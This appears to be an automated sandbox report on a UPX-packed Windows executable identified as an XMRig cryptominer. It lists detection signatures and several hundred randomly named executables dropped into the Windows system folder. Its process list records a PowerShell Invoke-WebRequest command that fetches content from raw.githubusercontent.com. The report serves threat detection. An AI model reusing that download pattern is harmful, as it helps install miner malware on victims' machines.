Malware Analysis Report

2025-04-19 17:56

Sample ID 240527-fadwcshe34
Target 1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe
SHA256 278b7dcb8b8b9d016e467be505f90d2819a9909157fbff258754812c33494627
Tags miner upx xmrig execution
Score 10/10

Analysis Overview

Score 10/10
SHA256 278b7dcb8b8b9d016e467be505f90d2819a9909157fbff258754812c33494627

Threat Level: Known bad

The file 1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe was found to be: Known bad.

Malicious Activity Summary

miner upx xmrig execution

xmrig

XMRig Miner payload

Xmrig family

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Executes dropped EXE

UPX packed file

Loads dropped DLL

Legitimate hosting services abused for malware hosting/C2

Drops file in Windows directory

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported 2024-05-27 04:39

Signatures

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Xmrig family

xmrig

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted 2024-05-27 04:39
Reported 2024-05-27 04:42
Platform win7-20240221-en
Max time kernel 150s
Max time network 142s

Command Line

"C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe"

Signatures

xmrig

miner xmrig

XMRig Miner payload

miner
Description Indicator Process Target
N/A N/A N/A N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Executes dropped EXE


Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A

Drops file in Windows directory


Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeLockMemoryPrivilege N/A C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory


Processes

C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe

"C:\Users\Admin\AppData\Local\Temp\1f5dd2f9cb017b85a0616edc5865e370_NeikiAnalytics.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell.exe -command "Invoke-WebRequest "https://raw.githubusercontent.com/" "


C:\Windows\System\shPjHBr.exe

C:\Windows\System\iWnbtnA.exe

C:\Windows\System\iWnbtnA.exe

C:\Windows\System\ZMdQyTh.exe

C:\Windows\System\ZMdQyTh.exe

C:\Windows\System\PoJfTee.exe

C:\Windows\System\PoJfTee.exe

C:\Windows\System\SRdWNnv.exe

C:\Windows\System\SRdWNnv.exe

C:\Windows\System\yNXTfos.exe

C:\Windows\System\yNXTfos.exe

C:\Windows\System\wfOeXiR.exe

C:\Windows\System\wfOeXiR.exe

C:\Windows\System\WNoEiFp.exe

C:\Windows\System\WNoEiFp.exe

C:\Windows\System\xcrepiD.exe

C:\Windows\System\xcrepiD.exe

C:\Windows\System\eCdwQnI.exe

C:\Windows\System\eCdwQnI.exe

C:\Windows\System\aewMkRd.exe

C:\Windows\System\aewMkRd.exe

C:\Windows\System\zeNNIXG.exe

C:\Windows\System\zeNNIXG.exe

C:\Windows\System\kVDVGIp.exe

C:\Windows\System\kVDVGIp.exe

C:\Windows\System\XsxcmGz.exe

C:\Windows\System\XsxcmGz.exe

C:\Windows\System\WOIBkfP.exe

C:\Windows\System\WOIBkfP.exe

C:\Windows\System\tlnvKGW.exe

C:\Windows\System\tlnvKGW.exe

C:\Windows\System\pIvwldd.exe

C:\Windows\System\pIvwldd.exe

C:\Windows\System\NXxxpVz.exe

C:\Windows\System\NXxxpVz.exe

C:\Windows\System\xQDjeLv.exe

C:\Windows\System\xQDjeLv.exe

C:\Windows\System\rcpJruw.exe

C:\Windows\System\rcpJruw.exe

C:\Windows\System\CkBuEFb.exe

C:\Windows\System\CkBuEFb.exe

C:\Windows\System\EvXjiEj.exe

C:\Windows\System\EvXjiEj.exe

C:\Windows\System\vTHBsny.exe

C:\Windows\System\vTHBsny.exe

C:\Windows\System\qyNzmIG.exe

C:\Windows\System\qyNzmIG.exe

C:\Windows\System\KKsHhrr.exe

C:\Windows\System\KKsHhrr.exe

C:\Windows\System\vLBkHot.exe

C:\Windows\System\vLBkHot.exe

C:\Windows\System\FFTjSuH.exe

C:\Windows\System\FFTjSuH.exe

C:\Windows\System\IdzRSpc.exe

C:\Windows\System\IdzRSpc.exe

C:\Windows\System\yqjiGBm.exe

C:\Windows\System\yqjiGBm.exe

C:\Windows\System\uuSdinO.exe

C:\Windows\System\uuSdinO.exe

C:\Windows\System\YtuIAEt.exe

C:\Windows\System\YtuIAEt.exe

C:\Windows\System\WxvHViX.exe

C:\Windows\System\WxvHViX.exe

C:\Windows\System\dvYeUWs.exe

C:\Windows\System\dvYeUWs.exe

C:\Windows\System\AKxfhbE.exe

C:\Windows\System\AKxfhbE.exe

C:\Windows\System\woYjFro.exe

C:\Windows\System\woYjFro.exe

C:\Windows\System\jtaianZ.exe

C:\Windows\System\jtaianZ.exe

C:\Windows\System\LTOynPe.exe

C:\Windows\System\LTOynPe.exe

C:\Windows\System\UcOjWVT.exe

C:\Windows\System\UcOjWVT.exe

C:\Windows\System\wELPHkh.exe

C:\Windows\System\wELPHkh.exe

C:\Windows\System\dtdFbEc.exe

C:\Windows\System\dtdFbEc.exe

C:\Windows\System\PGnAilm.exe

C:\Windows\System\PGnAilm.exe

C:\Windows\System\xKzvTmk.exe

C:\Windows\System\xKzvTmk.exe

C:\Windows\System\cBVybTC.exe

C:\Windows\System\cBVybTC.exe

C:\Windows\System\mrIuoLF.exe

C:\Windows\System\mrIuoLF.exe

C:\Windows\System\RPDTIlS.exe

C:\Windows\System\RPDTIlS.exe

C:\Windows\System\yiztiZG.exe

C:\Windows\System\yiztiZG.exe

C:\Windows\System\qDgtepq.exe

C:\Windows\System\qDgtepq.exe

C:\Windows\System\MfDmyxJ.exe

C:\Windows\System\MfDmyxJ.exe

C:\Windows\System\jcmWfgE.exe

C:\Windows\System\jcmWfgE.exe

C:\Windows\System\DjPoCkB.exe

C:\Windows\System\DjPoCkB.exe

C:\Windows\System\gvADKDZ.exe

C:\Windows\System\gvADKDZ.exe

C:\Windows\System\LNBOtca.exe

C:\Windows\System\LNBOtca.exe

C:\Windows\System\TuGZHNJ.exe

C:\Windows\System\TuGZHNJ.exe

C:\Windows\System\JaEZxnI.exe

C:\Windows\System\JaEZxnI.exe

C:\Windows\System\mmWhXkU.exe

C:\Windows\System\mmWhXkU.exe

C:\Windows\System\UvBFEFB.exe

C:\Windows\System\UvBFEFB.exe

C:\Windows\System\AUXmUZw.exe

C:\Windows\System\AUXmUZw.exe

C:\Windows\System\gmBWNXR.exe

C:\Windows\System\gmBWNXR.exe

C:\Windows\System\ecGqELv.exe

C:\Windows\System\ecGqELv.exe

C:\Windows\System\qCLwSVL.exe

C:\Windows\System\qCLwSVL.exe

C:\Windows\System\xUACzyo.exe

C:\Windows\System\xUACzyo.exe

C:\Windows\System\hzrHfhP.exe

C:\Windows\System\hzrHfhP.exe

C:\Windows\System\EUlGLEP.exe

C:\Windows\System\EUlGLEP.exe

C:\Windows\System\UXaciLM.exe

C:\Windows\System\UXaciLM.exe

C:\Windows\System\DYZfkGg.exe

C:\Windows\System\DYZfkGg.exe

C:\Windows\System\SeTiTLa.exe

C:\Windows\System\SeTiTLa.exe

C:\Windows\System\VLYYsUc.exe

C:\Windows\System\VLYYsUc.exe

C:\Windows\System\MZkwKwp.exe

C:\Windows\System\MZkwKwp.exe

C:\Windows\System\WEfwbLI.exe

C:\Windows\System\WEfwbLI.exe

C:\Windows\System\bxvtDSl.exe

C:\Windows\System\bxvtDSl.exe

C:\Windows\System\HnPDwte.exe

C:\Windows\System\HnPDwte.exe

C:\Windows\System\hSzrJiB.exe

C:\Windows\System\hSzrJiB.exe

C:\Windows\System\smQYKWr.exe

C:\Windows\System\smQYKWr.exe

C:\Windows\System\MtJwNOd.exe

C:\Windows\System\MtJwNOd.exe

C:\Windows\System\FIaEWSE.exe

C:\Windows\System\FIaEWSE.exe

C:\Windows\System\iDDVjxP.exe

C:\Windows\System\iDDVjxP.exe

C:\Windows\System\BMxRScU.exe

C:\Windows\System\BMxRScU.exe

C:\Windows\System\WHXdRAN.exe

C:\Windows\System\WHXdRAN.exe

C:\Windows\System\uMjFqsP.exe

C:\Windows\System\uMjFqsP.exe

C:\Windows\System\ISToyFn.exe

C:\Windows\System\ISToyFn.exe

C:\Windows\System\MEJETIA.exe

C:\Windows\System\MEJETIA.exe

C:\Windows\System\SzFkKxD.exe

C:\Windows\System\SzFkKxD.exe

C:\Windows\System\fDNsdVo.exe

C:\Windows\System\fDNsdVo.exe

C:\Windows\System\sLpjpbu.exe

C:\Windows\System\sLpjpbu.exe

C:\Windows\System\IpVtWfM.exe

C:\Windows\System\IpVtWfM.exe

C:\Windows\System\iyhbGTF.exe

C:\Windows\System\iyhbGTF.exe

C:\Windows\System\iLDZrzS.exe

C:\Windows\System\iLDZrzS.exe

C:\Windows\System\unhqBfG.exe

C:\Windows\System\unhqBfG.exe

C:\Windows\System\PBcVSQk.exe

C:\Windows\System\PBcVSQk.exe

C:\Windows\System\XTmoQMG.exe

C:\Windows\System\XTmoQMG.exe

C:\Windows\System\XBxHJUP.exe

C:\Windows\System\XBxHJUP.exe

C:\Windows\System\KjNDzyr.exe

C:\Windows\System\KjNDzyr.exe

C:\Windows\System\gWCBKjV.exe

C:\Windows\System\gWCBKjV.exe

C:\Windows\System\rOLpGae.exe

C:\Windows\System\rOLpGae.exe

C:\Windows\System\JgSEOqR.exe

C:\Windows\System\JgSEOqR.exe

C:\Windows\System\BbEjYFb.exe

C:\Windows\System\BbEjYFb.exe

C:\Windows\System\uLLliND.exe

C:\Windows\System\uLLliND.exe

C:\Windows\System\jcbPqdJ.exe

C:\Windows\System\jcbPqdJ.exe

C:\Windows\System\PRiByUp.exe

C:\Windows\System\PRiByUp.exe

C:\Windows\System\vUFsRFA.exe

C:\Windows\System\vUFsRFA.exe

C:\Windows\System\YIUokeK.exe

C:\Windows\System\YIUokeK.exe

C:\Windows\System\KZUQkma.exe

C:\Windows\System\KZUQkma.exe

C:\Windows\System\FZysnWm.exe

C:\Windows\System\FZysnWm.exe

C:\Windows\System\cJUGbiC.exe

C:\Windows\System\cJUGbiC.exe

C:\Windows\System\cHMAbhO.exe

C:\Windows\System\cHMAbhO.exe

C:\Windows\System\wdfdGeW.exe

C:\Windows\System\wdfdGeW.exe

C:\Windows\System\EoNhWpa.exe

C:\Windows\System\EoNhWpa.exe

C:\Windows\System\alfCNzY.exe

C:\Windows\System\alfCNzY.exe

C:\Windows\System\aeixRaz.exe

C:\Windows\System\aeixRaz.exe

C:\Windows\System\bohfBzE.exe

C:\Windows\System\bohfBzE.exe

C:\Windows\System\GwPQOLn.exe

C:\Windows\System\GwPQOLn.exe

C:\Windows\System\lHNDpKB.exe

C:\Windows\System\lHNDpKB.exe

C:\Windows\System\nJGqcgq.exe

C:\Windows\System\nJGqcgq.exe

C:\Windows\System\OpNLhXF.exe

C:\Windows\System\OpNLhXF.exe

C:\Windows\System\hxFZpVW.exe

C:\Windows\System\hxFZpVW.exe

C:\Windows\System\YadhTwo.exe

C:\Windows\System\YadhTwo.exe

C:\Windows\System\SNWJhOS.exe

C:\Windows\System\SNWJhOS.exe

C:\Windows\System\JLsxQrT.exe

C:\Windows\System\JLsxQrT.exe

C:\Windows\System\PQZZGrU.exe

C:\Windows\System\PQZZGrU.exe

C:\Windows\System\UgBywJb.exe

C:\Windows\System\UgBywJb.exe

C:\Windows\System\oVCiRGJ.exe

C:\Windows\System\oVCiRGJ.exe

C:\Windows\System\kqyMDQj.exe

C:\Windows\System\kqyMDQj.exe

C:\Windows\System\polduou.exe

C:\Windows\System\polduou.exe

C:\Windows\System\tJyBFfA.exe

C:\Windows\System\tJyBFfA.exe

C:\Windows\System\PgkcUkV.exe

C:\Windows\System\PgkcUkV.exe

C:\Windows\System\lqfwTET.exe

C:\Windows\System\lqfwTET.exe

C:\Windows\System\BmCkmDM.exe

C:\Windows\System\BmCkmDM.exe

C:\Windows\System\RKJdPZQ.exe

C:\Windows\System\RKJdPZQ.exe

C:\Windows\System\dJiRIeG.exe

C:\Windows\System\dJiRIeG.exe

C:\Windows\System\Lmfmbgb.exe

C:\Windows\System\Lmfmbgb.exe

C:\Windows\System\mPeMdZR.exe

C:\Windows\System\mPeMdZR.exe

C:\Windows\System\XDPzBuE.exe

C:\Windows\System\XDPzBuE.exe

C:\Windows\System\RSjnzgv.exe

C:\Windows\System\RSjnzgv.exe

C:\Windows\System\KrCdQUH.exe

C:\Windows\System\KrCdQUH.exe

C:\Windows\System\KfIMzin.exe

C:\Windows\System\KfIMzin.exe

C:\Windows\System\tSaHuJY.exe

C:\Windows\System\tSaHuJY.exe

C:\Windows\System\MuIlqST.exe

C:\Windows\System\MuIlqST.exe

C:\Windows\System\jsxhluZ.exe

C:\Windows\System\jsxhluZ.exe

C:\Windows\System\eYDecaj.exe

C:\Windows\System\eYDecaj.exe

C:\Windows\System\fBodasQ.exe

C:\Windows\System\fBodasQ.exe

C:\Windows\System\mrwBJeW.exe

C:\Windows\System\mrwBJeW.exe

C:\Windows\System\yAEsQGk.exe

C:\Windows\System\yAEsQGk.exe

C:\Windows\System\LxQqPna.exe

C:\Windows\System\LxQqPna.exe

C:\Windows\System\fjhrolE.exe

C:\Windows\System\fjhrolE.exe

C:\Windows\System\ZXmDlWt.exe

C:\Windows\System\ZXmDlWt.exe

C:\Windows\System\XHWbRuj.exe

C:\Windows\System\XHWbRuj.exe

C:\Windows\System\HYmLLLy.exe

C:\Windows\System\HYmLLLy.exe

C:\Windows\System\PvJYzcd.exe

C:\Windows\System\PvJYzcd.exe

C:\Windows\System\qWTsjuk.exe

C:\Windows\System\qWTsjuk.exe

C:\Windows\System\yTeuehb.exe

C:\Windows\System\yTeuehb.exe

C:\Windows\System\tCxWAAi.exe

C:\Windows\System\tCxWAAi.exe

C:\Windows\System\bwuKqLR.exe

C:\Windows\System\bwuKqLR.exe

C:\Windows\System\epTJIsy.exe

C:\Windows\System\epTJIsy.exe

C:\Windows\System\GuYxbCS.exe

C:\Windows\System\GuYxbCS.exe

C:\Windows\System\jRiZxqp.exe

C:\Windows\System\jRiZxqp.exe

C:\Windows\System\zTKvAuP.exe

C:\Windows\System\zTKvAuP.exe

C:\Windows\System\GZaWkaz.exe

C:\Windows\System\GZaWkaz.exe

C:\Windows\System\OXHkqIC.exe

C:\Windows\System\OXHkqIC.exe

C:\Windows\System\yikdbCQ.exe

C:\Windows\System\yikdbCQ.exe

C:\Windows\System\IoisEZW.exe

C:\Windows\System\IoisEZW.exe

C:\Windows\System\oNivlzY.exe

C:\Windows\System\oNivlzY.exe

C:\Windows\System\OGjraVC.exe

C:\Windows\System\OGjraVC.exe

C:\Windows\System\fRUZkFi.exe

C:\Windows\System\fRUZkFi.exe

C:\Windows\System\QZXFUXN.exe

C:\Windows\System\QZXFUXN.exe

C:\Windows\System\KYqfHiO.exe

C:\Windows\System\KYqfHiO.exe

C:\Windows\System\eYtAWGP.exe

C:\Windows\System\eYtAWGP.exe

C:\Windows\System\aTiqJti.exe

C:\Windows\System\aTiqJti.exe

C:\Windows\System\blkQpuH.exe

C:\Windows\System\blkQpuH.exe

C:\Windows\System\MCEOMEv.exe

C:\Windows\System\MCEOMEv.exe

C:\Windows\System\CTkLafY.exe

C:\Windows\System\CTkLafY.exe

C:\Windows\System\CEYSijU.exe

C:\Windows\System\CEYSijU.exe

C:\Windows\System\VsqpGzE.exe

C:\Windows\System\VsqpGzE.exe

C:\Windows\System\DdFzJVW.exe

C:\Windows\System\DdFzJVW.exe

C:\Windows\System\HkpsohM.exe

C:\Windows\System\HkpsohM.exe

C:\Windows\System\LBgbXfL.exe

C:\Windows\System\LBgbXfL.exe

C:\Windows\System\OxyqCNC.exe

C:\Windows\System\OxyqCNC.exe

C:\Windows\System\RcUsAIN.exe

C:\Windows\System\RcUsAIN.exe

C:\Windows\System\JWFDjPI.exe

C:\Windows\System\JWFDjPI.exe

C:\Windows\System\MUyJgqF.exe

C:\Windows\System\MUyJgqF.exe

C:\Windows\System\SdoDJxs.exe

C:\Windows\System\SdoDJxs.exe

C:\Windows\System\uzeRsIi.exe

C:\Windows\System\uzeRsIi.exe

C:\Windows\System\CknzizJ.exe

C:\Windows\System\CknzizJ.exe

C:\Windows\System\sVxOKPf.exe

C:\Windows\System\sVxOKPf.exe

C:\Windows\System\hFyxCGb.exe

C:\Windows\System\hFyxCGb.exe

C:\Windows\System\ywNgDqc.exe

C:\Windows\System\ywNgDqc.exe

C:\Windows\System\XVJjziZ.exe

C:\Windows\System\XVJjziZ.exe

C:\Windows\System\aKMHYDm.exe

C:\Windows\System\aKMHYDm.exe

C:\Windows\System\fdwcEFH.exe

C:\Windows\System\fdwcEFH.exe

C:\Windows\System\hftbnoA.exe

C:\Windows\System\hftbnoA.exe

C:\Windows\System\bOzMnzk.exe

C:\Windows\System\bOzMnzk.exe

C:\Windows\System\aosEoco.exe

C:\Windows\System\aosEoco.exe

C:\Windows\System\DkimDcv.exe

C:\Windows\System\DkimDcv.exe

C:\Windows\System\AbaCsGe.exe

C:\Windows\System\AbaCsGe.exe

C:\Windows\System\gdpnmvL.exe

C:\Windows\System\gdpnmvL.exe

C:\Windows\System\mhfKjBz.exe

C:\Windows\System\mhfKjBz.exe

C:\Windows\System\EmwFkXR.exe

C:\Windows\System\EmwFkXR.exe

C:\Windows\System\xlkyFDm.exe

C:\Windows\System\xlkyFDm.exe

C:\Windows\System\zKtQkWO.exe

C:\Windows\System\zKtQkWO.exe

C:\Windows\System\WauiUcL.exe

C:\Windows\System\WauiUcL.exe

C:\Windows\System\QeLPNGH.exe

C:\Windows\System\QeLPNGH.exe

C:\Windows\System\LTnIjFV.exe

C:\Windows\System\LTnIjFV.exe

C:\Windows\System\iifSKwN.exe

C:\Windows\System\iifSKwN.exe

C:\Windows\System\ohfSmFD.exe

C:\Windows\System\ohfSmFD.exe

C:\Windows\System\DdkOtmb.exe

C:\Windows\System\DdkOtmb.exe

C:\Windows\System\XlcKmWj.exe

C:\Windows\System\XlcKmWj.exe

C:\Windows\System\hzoyjfI.exe

C:\Windows\System\hzoyjfI.exe

C:\Windows\System\Ditnins.exe

C:\Windows\System\Ditnins.exe

C:\Windows\System\TUPxkKP.exe

C:\Windows\System\TUPxkKP.exe

C:\Windows\System\EaSJAQj.exe

C:\Windows\System\EaSJAQj.exe

C:\Windows\System\YaFHiau.exe

C:\Windows\System\YaFHiau.exe

C:\Windows\System\tqWUGAi.exe

C:\Windows\System\tqWUGAi.exe

C:\Windows\System\tFLLRkZ.exe

C:\Windows\System\tFLLRkZ.exe

C:\Windows\System\LWOlFIY.exe

C:\Windows\System\LWOlFIY.exe

C:\Windows\System\BKmTemH.exe

C:\Windows\System\BKmTemH.exe

C:\Windows\System\VdLrsLM.exe

C:\Windows\System\VdLrsLM.exe

C:\Windows\System\DdvLlVs.exe

C:\Windows\System\DdvLlVs.exe

C:\Windows\System\sDdMWQt.exe

C:\Windows\System\sDdMWQt.exe

C:\Windows\System\GZXWElZ.exe

C:\Windows\System\GZXWElZ.exe

C:\Windows\System\dIKGFgT.exe

C:\Windows\System\dIKGFgT.exe

C:\Windows\System\yYOZNqI.exe

C:\Windows\System\yYOZNqI.exe

C:\Windows\System\IlcHwHs.exe

C:\Windows\System\IlcHwHs.exe

C:\Windows\System\nSmVOno.exe

C:\Windows\System\nSmVOno.exe

C:\Windows\System\APyzFkR.exe

C:\Windows\System\APyzFkR.exe

C:\Windows\System\AsBmXnN.exe

C:\Windows\System\AsBmXnN.exe

C:\Windows\System\xMLjnle.exe

C:\Windows\System\xMLjnle.exe

C:\Windows\System\hTPkXje.exe

C:\Windows\System\hTPkXje.exe

C:\Windows\System\WGJEmpd.exe

C:\Windows\System\WGJEmpd.exe

C:\Windows\System\ULwEgMy.exe

C:\Windows\System\ULwEgMy.exe

C:\Windows\System\QwhjpYc.exe

C:\Windows\System\QwhjpYc.exe

C:\Windows\System\UwNyYJZ.exe

C:\Windows\System\UwNyYJZ.exe

C:\Windows\System\MvfVdTB.exe

C:\Windows\System\MvfVdTB.exe

C:\Windows\System\vldfecH.exe

C:\Windows\System\vldfecH.exe

C:\Windows\System\uWXHhDJ.exe

C:\Windows\System\uWXHhDJ.exe

C:\Windows\System\xtmXVFh.exe

C:\Windows\System\xtmXVFh.exe

C:\Windows\System\qeSmSdD.exe

C:\Windows\System\qeSmSdD.exe

C:\Windows\System\RpQefLp.exe

C:\Windows\System\RpQefLp.exe

C:\Windows\System\QPmqrRZ.exe

C:\Windows\System\QPmqrRZ.exe

C:\Windows\System\cBtPveF.exe

C:\Windows\System\cBtPveF.exe

C:\Windows\System\HaivoMP.exe

C:\Windows\System\HaivoMP.exe

C:\Windows\System\kQLNqVh.exe

C:\Windows\System\kQLNqVh.exe

C:\Windows\System\hxWVBwV.exe

C:\Windows\System\hxWVBwV.exe

C:\Windows\System\gzqHQtD.exe

C:\Windows\System\gzqHQtD.exe

C:\Windows\System\OGRsWIl.exe

C:\Windows\System\OGRsWIl.exe

C:\Windows\System\vWSsnpA.exe

C:\Windows\System\vWSsnpA.exe

C:\Windows\System\KNshqwl.exe

C:\Windows\System\KNshqwl.exe

C:\Windows\System\qUpEQOP.exe

C:\Windows\System\qUpEQOP.exe

C:\Windows\System\aeDctcp.exe

C:\Windows\System\aeDctcp.exe

C:\Windows\System\ZSBMSBX.exe

C:\Windows\System\ZSBMSBX.exe

C:\Windows\System\PdeYFOf.exe

C:\Windows\System\PdeYFOf.exe

C:\Windows\System\fogChyJ.exe

C:\Windows\System\fogChyJ.exe

C:\Windows\System\lZpDGzw.exe

C:\Windows\System\lZpDGzw.exe

C:\Windows\System\rsKyGLy.exe

C:\Windows\System\rsKyGLy.exe

C:\Windows\System\LCDaAGH.exe

C:\Windows\System\LCDaAGH.exe

C:\Windows\System\LUJzrtC.exe

C:\Windows\System\LUJzrtC.exe

C:\Windows\System\TlXwXHn.exe

C:\Windows\System\TlXwXHn.exe

C:\Windows\System\gzDBNFp.exe

C:\Windows\System\gzDBNFp.exe

C:\Windows\System\GECyhCi.exe

C:\Windows\System\GECyhCi.exe

C:\Windows\System\BQcYrnO.exe

C:\Windows\System\BQcYrnO.exe

C:\Windows\System\MJgWtRO.exe

C:\Windows\System\MJgWtRO.exe

C:\Windows\System\fAdBbkf.exe

C:\Windows\System\fAdBbkf.exe

C:\Windows\System\ZLOWqUA.exe

C:\Windows\System\ZLOWqUA.exe

C:\Windows\System\WPnlYnr.exe

C:\Windows\System\WPnlYnr.exe

C:\Windows\System\ZkOpfxy.exe

C:\Windows\System\ZkOpfxy.exe

C:\Windows\System\ouNkPEh.exe

C:\Windows\System\ouNkPEh.exe

C:\Windows\System\USWToYc.exe

C:\Windows\System\USWToYc.exe

C:\Windows\System\toOjCXr.exe

C:\Windows\System\toOjCXr.exe

C:\Windows\System\JfDJgFl.exe

C:\Windows\System\JfDJgFl.exe

C:\Windows\System\QbAfQzv.exe

C:\Windows\System\QbAfQzv.exe

C:\Windows\System\IjaMgnw.exe

C:\Windows\System\IjaMgnw.exe

C:\Windows\System\FzcaGgt.exe

C:\Windows\System\FzcaGgt.exe

C:\Windows\System\DmbaXRV.exe

C:\Windows\System\DmbaXRV.exe

C:\Windows\System\iIvRDCG.exe

C:\Windows\System\iIvRDCG.exe

C:\Windows\System\hUNNytK.exe

C:\Windows\System\hUNNytK.exe

C:\Windows\System\dxwjVug.exe

C:\Windows\System\dxwjVug.exe

C:\Windows\System\qKxJVhG.exe

C:\Windows\System\qKxJVhG.exe

C:\Windows\System\sRQZbTW.exe

C:\Windows\System\sRQZbTW.exe

C:\Windows\System\xebWWDe.exe

C:\Windows\System\xebWWDe.exe

C:\Windows\System\WqSfLsI.exe

C:\Windows\System\WqSfLsI.exe

C:\Windows\System\wXzRlHG.exe

C:\Windows\System\wXzRlHG.exe

C:\Windows\System\YWzAFxd.exe

C:\Windows\System\YWzAFxd.exe

C:\Windows\System\jiquccF.exe

C:\Windows\System\jiquccF.exe

C:\Windows\System\SUAEnir.exe

C:\Windows\System\SUAEnir.exe

C:\Windows\System\qARqdJT.exe

C:\Windows\System\qARqdJT.exe

C:\Windows\System\LoBOepy.exe

C:\Windows\System\LoBOepy.exe

C:\Windows\System\yIWFXFM.exe

C:\Windows\System\yIWFXFM.exe

C:\Windows\System\ijMRmxu.exe

C:\Windows\System\ijMRmxu.exe

C:\Windows\System\JlOpOMy.exe

C:\Windows\System\JlOpOMy.exe

C:\Windows\System\ngJZcjq.exe

C:\Windows\System\ngJZcjq.exe

C:\Windows\System\wVgGeal.exe

C:\Windows\System\wVgGeal.exe

C:\Windows\System\MAdynms.exe

C:\Windows\System\MAdynms.exe

C:\Windows\System\nIpSXNI.exe

C:\Windows\System\nIpSXNI.exe

C:\Windows\System\vzQSjIs.exe

C:\Windows\System\vzQSjIs.exe

C:\Windows\System\CwarUjt.exe

C:\Windows\System\CwarUjt.exe

C:\Windows\System\ANRGXoE.exe

C:\Windows\System\ANRGXoE.exe

C:\Windows\System\eMNoDKw.exe

C:\Windows\System\eMNoDKw.exe

C:\Windows\System\jxTaQnH.exe

C:\Windows\System\jxTaQnH.exe

C:\Windows\System\akZvdap.exe

C:\Windows\System\akZvdap.exe

C:\Windows\System\cbyveVE.exe

C:\Windows\System\cbyveVE.exe

C:\Windows\System\ohnMqur.exe

C:\Windows\System\ohnMqur.exe

C:\Windows\System\MPVekuH.exe

C:\Windows\System\MPVekuH.exe

C:\Windows\System\ZNASbvn.exe

C:\Windows\System\ZNASbvn.exe

C:\Windows\System\EFAhyfH.exe

C:\Windows\System\EFAhyfH.exe

C:\Windows\System\jipHuPa.exe

C:\Windows\System\jipHuPa.exe

C:\Windows\System\xutxDDX.exe

C:\Windows\System\xutxDDX.exe

C:\Windows\System\gnytdUb.exe

C:\Windows\System\gnytdUb.exe

C:\Windows\System\nUELqJg.exe

C:\Windows\System\nUELqJg.exe

C:\Windows\System\ZlUKZkC.exe

C:\Windows\System\ZlUKZkC.exe

C:\Windows\System\dRTfdYy.exe

C:\Windows\System\dRTfdYy.exe

C:\Windows\System\effeWqj.exe

C:\Windows\System\effeWqj.exe

C:\Windows\System\oxOvXOG.exe

C:\Windows\System\oxOvXOG.exe

C:\Windows\System\UalWBgD.exe

C:\Windows\System\UalWBgD.exe

C:\Windows\System\eupvAhS.exe

C:\Windows\System\eupvAhS.exe

C:\Windows\System\NjTHTqQ.exe

C:\Windows\System\NjTHTqQ.exe

C:\Windows\System\XitGGwd.exe

C:\Windows\System\XitGGwd.exe

C:\Windows\System\bSyHUOW.exe

C:\Windows\System\bSyHUOW.exe

C:\Windows\System\uwLCmIP.exe

C:\Windows\System\uwLCmIP.exe

C:\Windows\System\RdaSIBs.exe

C:\Windows\System\RdaSIBs.exe

C:\Windows\System\dEDIPLx.exe

C:\Windows\System\dEDIPLx.exe

C:\Windows\System\VqHIxfC.exe

C:\Windows\System\VqHIxfC.exe

C:\Windows\System\dJOnNsW.exe

C:\Windows\System\dJOnNsW.exe

C:\Windows\System\GRYsaRQ.exe

C:\Windows\System\GRYsaRQ.exe

C:\Windows\System\bXJGllc.exe

C:\Windows\System\bXJGllc.exe

C:\Windows\System\EvLVeZz.exe

C:\Windows\System\EvLVeZz.exe

C:\Windows\System\EvxMWRi.exe

C:\Windows\System\EvxMWRi.exe

C:\Windows\System\hYRycWw.exe

C:\Windows\System\hYRycWw.exe

C:\Windows\System\DaTNlIo.exe

C:\Windows\System\DaTNlIo.exe

C:\Windows\System\RPvQAKI.exe

C:\Windows\System\RPvQAKI.exe

C:\Windows\System\EpUiCUB.exe

C:\Windows\System\EpUiCUB.exe

C:\Windows\System\TzLvhuI.exe

C:\Windows\System\TzLvhuI.exe

C:\Windows\System\EZKdIEx.exe

C:\Windows\System\EZKdIEx.exe

C:\Windows\System\UMJLiYL.exe

C:\Windows\System\UMJLiYL.exe

C:\Windows\System\kqmajxM.exe

C:\Windows\System\kqmajxM.exe

C:\Windows\System\ZBsWVxn.exe

C:\Windows\System\ZBsWVxn.exe

C:\Windows\System\gBihiFE.exe

C:\Windows\System\gBihiFE.exe

C:\Windows\System\sOfozJt.exe

C:\Windows\System\sOfozJt.exe

C:\Windows\System\eEIVbPM.exe

C:\Windows\System\eEIVbPM.exe

C:\Windows\System\VHnElbx.exe

C:\Windows\System\VHnElbx.exe

C:\Windows\System\TspMWpZ.exe

C:\Windows\System\TspMWpZ.exe

C:\Windows\System\cwrHUKY.exe

C:\Windows\System\cwrHUKY.exe

C:\Windows\System\euVaGbQ.exe

C:\Windows\System\euVaGbQ.exe

C:\Windows\System\XJAnxLg.exe

C:\Windows\System\XJAnxLg.exe

C:\Windows\System\lccqbse.exe

C:\Windows\System\lccqbse.exe

C:\Windows\System\MWonluf.exe

C:\Windows\System\MWonluf.exe

C:\Windows\System\ZOnaNeS.exe

C:\Windows\System\ZOnaNeS.exe
